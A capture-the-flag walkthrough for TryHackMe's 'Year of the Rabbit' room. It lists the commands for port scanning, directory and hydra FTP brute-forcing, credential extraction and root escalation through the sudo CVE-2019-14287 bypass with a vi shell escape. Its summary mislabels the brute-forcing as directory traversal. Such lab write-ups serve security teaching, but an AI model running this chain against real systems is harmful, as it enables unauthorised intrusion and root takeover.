TryHackMe | Year of the Rabbit | Walkthrough



1. Initial Enumeration

The first step in any CTF is enumeration. Start by performing an nmap scan to discover open ports on the target machine.

nmap -p- -v <TARGET_IP> -Pn --min-rate 5000 -oN init

Follow this up with a more detailed scan on the identified ports (FTP, SSH, HTTP):

 nmap -p21,22,80 -A <TARGET_IP> -v -oN target

Key results:

  • Port 21: FTP server (vsftpd 3.0.2) – anonymous login disabled.
  • Port 22: SSH server (OpenSSH 6.7p1)
  • Port 80: Web server (Apache 2.4.10)

 

 

2. Web Directory Bruteforce

To uncover hidden directories, we’ll use gobuster to brute-force the web server:

gobuster dir -u http://<TARGET_IP> -w /path/to/wordlist.txt

 You’ll find a directory /WExYY2Cv-qU/ that contains an image file named Hot_Babe.png.

 

3. Inspect the Image

Let’s download the image and inspect it for any hidden information.

wget http://<TARGET_IP>/WExYY2Cv-qU/Hot_Babe.png

Next, use the strings command to check if there’s any embedded text within the image:

 strings Hot_Babe.png

 Result: You’ll find FTP credentials and a password list hidden in the image.

 

4. Brute-Force FTP Login

Using the discovered credentials, brute-force the FTP login with hydra:

 hydra -l ftpuser -P password_list.txt ftp://<TARGET_IP>

 Once hydra cracks the login, you’ll have the username and password for the FTP service.

 

5. Download Sensitive File

Now, log in to the FTP server and download a file named Eli's_Creds.txt:

 ftp <TARGET_IP>
get Eli's_Creds.txt

 The file contains data written in Brainf*ck language. After decoding, you’ll retrieve the SSH credentials for the user eli.

 

6. SSH into the Machine

With eli's SSH credentials, you can now log in to the machine:

ssh eli@<TARGET_IP>

 

7. Moving to Gwendoline's Account

Inside eli’s account, you’ll find clues leading to Gwendoline’s account. After searching through the directories, you’ll locate a file that reveals Gwendoline’s password in /usr/games/s3cr3t/.

locate s3cr3t

 

8. SSH into Gwendoline’s Account

With the password found, log in to Gwendoline’s account:

 ssh gwendoline@<TARGET_IP>

9. Privilege Escalation

To escalate privileges, check sudo permissions by running:

sudo -l

 

You’ll notice that vi can be run with limited commands. Now, we’ll exploit CVE-2019-14287, a vulnerability in sudo, to bypass the restriction and execute as root:

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

 

Once in vi, escape to a root shell with:

:!/bin/bash

 

10. Capture the Flags

Now that you have root access, capture both the user and root flags.

    User Flag: Located in /home/gwendoline/user.txt

 cat /home/gwendoline/user.txt

 

Root Flag: Located in /root/root.txt

cat /root/root.txt

 

 

Summary of Attacks:

  • Directory Traversal: We uncovered hidden directories to gather credentials.
  • Privilege Escalation: Using CVE-2019-14287, we escalated to root and captured the flags.

Congratulations on completing the Year of the Rabbit challenge! If you enjoyed this walkthrough, stay tuned for more CTF challenge solutions!

 

 

 


 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Comments

Post a Comment

Popular Posts